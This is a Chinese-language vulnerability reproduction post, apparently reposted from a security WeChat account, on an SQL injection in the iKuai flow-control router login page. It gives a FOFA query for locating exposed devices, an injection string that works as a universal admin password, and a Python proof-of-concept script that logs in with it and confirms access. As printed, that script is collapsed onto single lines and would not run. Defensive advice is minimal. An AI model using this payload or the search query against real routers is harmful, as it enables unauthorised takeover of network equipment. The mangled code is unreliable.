iKuai 流控路由 SQL注入漏洞

2023-10-15 14:13:50

文章目录

  • iKuai 流控路由 SQL注入漏洞
    • 1.iKuai 流控路由简介
    • 2.漏洞描述
    • 3.影响版本
    • 4.fofa查询语句
    • 5.漏洞复现
    • 6.POC&EXP
    • 7.整改意见

iKuai 流控路由 SQL注入漏洞

1.iKuai 流控路由简介

微信公众号搜索:南风漏洞复现文库
南风网络安全公众号首发

企业级流控路由是中国全讯汇聚网络科技公司的一款企业级流控路由。

2.漏洞描述

iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限

3.影响版本

4.fofa查询语句

title="登录爱快流控路由"

5.漏洞复现

使用万能密码登录后台

user: "or""=""or""="
pass: 空

iKuai 流控路由 SQL注入漏洞
iKuai 流控路由 SQL注入漏洞

6.POC&EXP

以下代码保存为test.py
用法 python3 test.py http://127.0.0.1/

#!usr/bin/env python
# *-* coding:utf-8 *-*
import requests
import json
import sys
import urllib3
urllib3.disable_warnings()
proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def cookie(url):headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)','Content-Type': 'text/plain;charset=UTF-8'}r = requests.post(url, headers=headers, verify=False, timeout=30)if r.status_code == 200 and 'Set-Cookie' in r.headers:return ';'.join([f'{k}={v}' for k, v in r.cookies.get_dict().items()])return Nonedef poc(arg):cookies = cookie(arg)if cookies:try:header = {'Cookie': cookies,'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}login_url = arg + 'login/x'data = '''user="or""=""or""="&pass='''r= requests.post(login_url, headers=header, data=data ,verify=False, timeout=30,proxies=proxies)if r.status_code== 200 and '"recode":0' in r.text:vuln_url = arg + 'Log/webappLog'r= requests.get(vuln_url, headers=header,proxies=proxies)if r.status_code == 200 and '/System/security' in r.text:print('存在漏洞:'+arg)except Exception as e:print('出错:'+str(e))passurl=sys.argv[1]        
poc(url)

7.整改意见

建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法: http://www.ikuai8.com/


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

Duilib中list控件支持ctrl和shif多行选中的实现

[ICML2015]Batch Normalization:Accelerating Deep Network Training by Reducing Internal Covariate Shif

win10系统 微软输入法 于eclipse ctrl+shif+f冲突间接处理办法

Codeforces Round #259 (Div. 2) B. Little Pony and Sort by Shif

读LDD3,内存映射与DMA--PAGE_SHIF…

VMware虚拟机安装XP【要先分区,再设置BOOT 启动CD,shif+上移】

更换iBus五笔的左与右Shif

sublime ctrl+shif+f 没用解决办法

idea 对 ctrl + z 的撤销 是 ctrl + shif + z

计算机最早的设计师应用于,计算机应用基础选择题doc.doc

win10自带截图神器:Win+Shift+S

Python基础之文件目录操作

python简述目录_Python基础之文件目录操作(示例代码)

tp5 如何做数据采集

任务2-7(服务器字体+阿里巴巴矢量库)

html标签(1):h1~h6,p,br,pre,hr

TI 电量计介绍与芯片选型指南

几款TI电源芯片简介

TI DSP芯片C2000系列读取FLASH数据

德州仪器(Ti)平台嵌入式开发基础

TI三相电机智能栅极驱动芯片特点分类

省选模拟(12.08) T3 圈圈圈圈圈圈圈圈

Hadoop生态圈技术栈(上)

大数据开发基础入门与项目实战(三)Hadoop核心及生态圈技术栈之6.Impala交互式查询

小猿圈之Linux下Mysql 操作命令

大数据Hadoop生态圈常用面试题

大数据开发基础入门与项目实战(三)Hadoop核心及生态圈技术栈之4.Hive DDL、DQL和数据操作

备战Noip2018模拟赛11(B组)T3 Monogatari 物语

【智能优化算法-圆圈搜索算法】基于圆圈搜索算法Circle Search Algorithm求解单目标优化问题附matlab代码

NYOJ 78 圈水池

递归问题 跑道 汽车 绕圈问题 Python实现

Hadoop生态圈(三):MapReduce

立即
投稿

微信公众账号

微信扫一扫加关注

 返回
顶部